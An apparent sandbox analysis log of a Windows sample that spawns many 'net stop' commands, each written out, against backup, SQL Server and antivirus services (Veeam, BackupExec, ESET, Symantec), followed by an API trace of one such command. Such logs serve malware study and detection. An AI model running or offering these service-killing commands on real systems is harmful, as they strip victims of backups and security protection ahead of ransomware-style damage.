"child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VSNAPVSS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 398 os_tid = 0xcd4 Process: id = "62" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x73af1000" os_pid = "0xce4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$SQLEXPRESS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 400 os_tid = 0xce8 Process: id = "63" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x258f2000" os_pid = "0xd10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SavRoam /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 403 os_tid = 0xd14 Process: id = "64" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x27776000" os_pid = "0xd24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamTransportSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 406 os_tid = 0xd28 Process: id = "65" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0xafc9000" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop ekrn /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 407 os_tid = 0xd40 Process: id = "66" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1b8d1000" os_pid = "0xd50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop RTVscan /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 408 os_tid = 0xd54 Process: id = "67" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x726de000" os_pid = "0xd64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamDeploymentService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 410 os_tid = 0xd68 Process: id = "68" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2020c000" os_pid = "0xdac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop mozyprobackup /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 424 os_tid = 0xdb0 Process: id = "69" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x21a11000" os_pid = "0xdf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop QBFCService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 433 os_tid = 0xdf4 Process: id = "70" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1af27000" os_pid = "0xe04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 434 os_tid = 0xe08 Process: id = "71" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2022c000" os_pid = "0xe20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamNFSSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 436 os_tid = 0xe24 Process: id = "72" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x20831000" os_pid = "0xe30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop EPSecurityService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 437 os_tid = 0xe34 Process: id = "73" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x26936000" os_pid = "0xe38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecAgentBrowser /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 438 os_tid = 0xe3c Process: id = "74" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2253b000" os_pid = "0xe54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 439 os_tid = 0xe58 Process: id = "75" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x71440000" os_pid = "0xe64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop veeam /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 440 os_tid = 0xe68 Process: id = "76" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6fd45000" os_pid = "0xe6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 441 os_tid = 0xe70 Process: id = "77" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x27413000" os_pid = "0xe74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x814" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 442 os_tid = 0xe78 [0097.024] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ffdfc | out: lpSystemTimeAsFileTime=0x1ffdfc*(dwLowDateTime=0x105ba950, dwHighDateTime=0x1d6f0d1)) [0097.024] GetCurrentProcessId () returned 0xe74 [0097.024] GetCurrentThreadId () returned 0xe78 [0097.024] GetTickCount () returned 0x114ccf0 [0097.025] QueryPerformanceCounter (in: lpPerformanceCount=0x1ffdf4 | out: lpPerformanceCount=0x1ffdf4*=21612539870) returned 1 [0097.025] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0097.025] __set_app_type (_Type=0x1) [0097.025] __p__fmode () returned 0x770331f4 [0097.025] __p__commode () returned 0x770331fc [0097.025] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0097.025] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0097.025] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0097.025] GetConsoleOutputCP () returned 0x1b5 [0097.025] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0097.026] SetThreadUILanguage (LangId=0x0) returned 0x409 [0097.028] sprintf_s (in: _DstBuf=0x1ffdb4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0097.028] setlocale (category=0, locale=".437") returned="English_United States.437" [0097.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2fc [0097.030] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0097.030] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQL_2008 /y" [0097.030] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ffb80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0097.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x783ae0 [0097.030] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0097.030] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ffd84 | out: Buffer=0x1ffd84*=0x781ae8) returned 0x0 [0097.030] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ffd84 | out: Buffer=0x1ffd84*=0x781b00) returned 0x0 [0097.031] _fileno (_File=0x77032900) returned -2 [0097.031] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0097.031] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0097.031] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0097.031] _wcsicmp (_String1="config", _String2="stop") returned -16 [0097.031] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0097.031] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0097.031] _wcsicmp (_String1="file", _String2="stop") returned -13 [0097.031] _wcsicmp (_String1="files", _String2="stop") returned -13 [0097.031] _wcsicmp (_String1="group", _String2="stop") returned -12 [0097.031] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0097.031] _wcsicmp (_String1="help", _String2="stop") returned -11 [0097.031] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0097.031] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0097.031] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0097.031] _wcsicmp (_String1="session", _String2="stop") returned -15 [0097.031] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0097.031] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0097.031] _wcsicmp (_String1="share", _String2="stop") returned -12 [0097.031] _wcsicmp (_String1="start", _String2="stop") returned -14 [0097.031] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0097.031] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0097.031] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0097.031] _wcsicmp (_String1="accounts", _String2="MSSQL$SQL_2008") returned -12 [0097.031] _wcsicmp (_String1="computer", _String2="MSSQL$SQL_2008") returned -10 [0097.031] _wcsicmp (_String1="config", _String2="MSSQL$SQL_2008") returned -10 [0097.031] _wcsicmp (_String1="continue", _String2="MSSQL$SQL_2008") returned -10 [0097.031] _wcsicmp (_String1="cont", _String2="MSSQL$SQL_2008") returned -10 [0097.031] _wcsicmp (_String1="file", _String2="MSSQL$SQL_2008") returned -7 [0097.031] _wcsicmp (_String1="files", _String2="MSSQL$SQL_2008") returned -7 [0097.031] _wcsicmp (_String1="group", _String2="MSSQL$SQL_2008") returned -6 [0097.031] _wcsicmp (_String1="groups", _String2="MSSQL$SQL_2008") returned -6 [0097.031] _wcsicmp (_String1="help", _String2="MSSQL$SQL_2008") returned -5 [0097.031] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SQL_2008") returned -5 [0097.031] _wcsicmp (_String1="localgroup", _String2="MSSQL$SQL_2008") returned -1 [0097.032] _wcsicmp (_String1="pause", _String2="MSSQL$SQL_2008") returned 3 [0097.032] _wcsicmp (_String1="session", _String2="MSSQL$SQL_2008") returned 6 [0097.032] _wcsicmp (_String1="sessions", _String2="MSSQL$SQL_2008") returned 6 [0097.032] _wcsicmp (_String1="sess", _String2="MSSQL$SQL_2008") returned 6 [0097.032] _wcsicmp (_String1="share", _String2="MSSQL$SQL_2008") returned 6 [0097.032] _wcsicmp (_String1="start", _String2="MSSQL$SQL_2008") returned 6 [0097.032] _wcsicmp (_String1="stats", _String2="MSSQL$SQL_2008") returned 6 [0097.032] _wcsicmp (_String1="statistics", _String2="MSSQL$SQL_2008") returned 6 [0097.032] _wcsicmp (_String1="stop", _String2="MSSQL$SQL_2008") returned 6 [0097.032] _wcsicmp (_String1="time", _String2="MSSQL$SQL_2008") returned 7 [0097.032] _wcsicmp (_String1="user", _String2="MSSQL$SQL_2008") returned 8 [0097.032] _wcsicmp (_String1="users", _String2="MSSQL$SQL_2008") returned 8 [0097.032] _wcsicmp (_String1="msg", _String2="MSSQL$SQL_2008") returned -12 [0097.032] _wcsicmp (_String1="messenger", _String2="MSSQL$SQL_2008") returned -14 [0097.032] _wcsicmp (_String1="receiver", _String2="MSSQL$SQL_2008") returned 5 [0097.032] _wcsicmp (_String1="rcv", _String2="MSSQL$SQL_2008") returned 5 [0097.032] _wcsicmp (_String1="netpopup", _String2="MSSQL$SQL_2008") returned 1 [0097.032] _wcsicmp (_String1="redirector", _String2="MSSQL$SQL_2008") returned 5 [0097.032] _wcsicmp (_String1="redir", _String2="MSSQL$SQL_2008") returned 5 [0097.032] _wcsicmp (_String1="rdr", _String2="MSSQL$SQL_2008") returned 5 [0097.032] _wcsicmp (_String1="workstation", _String2="MSSQL$SQL_2008") returned 10 [0097.032] _wcsicmp (_String1="work", _String2="MSSQL$SQL_2008") returned 10 [0097.032] _wcsicmp (_String1="wksta", _String2="MSSQL$SQL_2008") returned 10 [0097.032] _wcsicmp (_String1="prdr", _String2="MSSQL$SQL_2008") returned 3 [0097.032] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQL_2008") returned -9 [0097.032] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQL_2008") returned -1 [0097.032] _wcsicmp (_String1="server", _String2="MSSQL$SQL_2008") returned 6 [0097.032] _wcsicmp (_String1="svr", _String2="MSSQL$SQL_2008") returned 6 [0097.032] _wcsicmp (_String1="srv", _String2="MSSQL$SQL_2008") returned 6 [0097.032] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQL_2008") returned -1 [0097.032] _wcsicmp (_String1="alerter", _String2="MSSQL$SQL_2008") returned -12 [0097.032] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQL_2008") returned 1 [0097.033] _wcsupr (in: _String="MSSQL$SQL_2008" | out: _String="MSSQL$SQL_2008") returned="MSSQL$SQL_2008" [0097.033] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7854b0 [0097.035] GetServiceKeyNameW (in: hSCManager=0x7854b0, lpDisplayName="MSSQL$SQL_2008", lpServiceName=0x3faaf0, lpcchBuffer=0x1ffd20 | out: lpServiceName="", lpcchBuffer=0x1ffd20) returned 0 [0097.035] _wcsicmp (_String1="msg", _String2="MSSQL$SQL_2008") returned -12 [0097.035] _wcsicmp (_String1="messenger", _String2="MSSQL$SQL_2008") returned -14 [0097.035] _wcsicmp (_String1="receiver", _String2="MSSQL$SQL_2008") returned 5 [0097.035] _wcsicmp (_String1="rcv", _String2="MSSQL$SQL_2008") returned 5 [0097.035] _wcsicmp (_String1="redirector", _String2="MSSQL$SQL_2008") returned 5 [0097.035] _wcsicmp (_String1="redir", _String2="MSSQL$SQL_2008") returned 5 [0097.035] _wcsicmp (_String1="rdr", _String2="MSSQL$SQL_2008") returned 5 [0097.035] _wcsicmp (_String1="workstation", _String2="MSSQL$SQL_2008") returned 10 [0097.035] _wcsicmp (_String1="work", _String2="MSSQL$SQL_2008") returned 10 [0097.035] _wcsicmp (_String1="wksta", _String2="MSSQL$SQL_2008") returned 10 [0097.035] _wcsicmp (_String1="prdr", _String2="MSSQL$SQL_2008") returned 3 [0097.035] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQL_2008") returned -9 [0097.035] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQL_2008") returned -1 [0097.035] _wcsicmp (_String1="server", _String2="MSSQL$SQL_2008") returned 6 [0097.035] _wcsicmp (_String1="svr", _String2="MSSQL$SQL_2008") returned 6 [0097.035] _wcsicmp (_String1="srv", _String2="MSSQL$SQL_2008") returned 6 [0097.035] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQL_2008") returned -1 [0097.035] _wcsicmp (_String1="alerter", _String2="MSSQL$SQL_2008") returned -12 [0097.036] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQL_2008") returned 1 [0097.036] NetServiceControl (in: servername=0x0, service="MSSQL$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x1ffd1c | out: bufptr=0x1ffd1c) returned 0x889 [0097.036] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0097.036] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0097.037] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0097.038] GetFileType (hFile=0x0) returned 0x0 [0097.038] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x783ed0 [0097.038] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x783ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0097.038] WriteFile (in: hFile=0x0, lpBuffer=0x783ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1ffc5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ffc5c, lpOverlapped=0x0) returned 0 [0097.038] LocalFree (hMem=0x783ed0) returned 0x0 [0097.038] GetFileType (hFile=0x0) returned 0x0 [0097.038] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x786178 [0097.038] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x786178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nx", lpUsedDefaultChar=0x0) returned 2 [0097.038] WriteFile (in: hFile=0x0, lpBuffer=0x786178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ffc5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ffc5c, lpOverlapped=0x0) returned 0 [0097.038] LocalFree (hMem=0x786178) returned 0x0 [0097.038] _ultow (in: _Dest=0x889, _Radix=2096268 | out: _Dest=0x889) returned="2185" [0097.038] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0097.038] GetFileType (hFile=0x0) returned 0x0 [0097.038] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x786178 [0097.038] 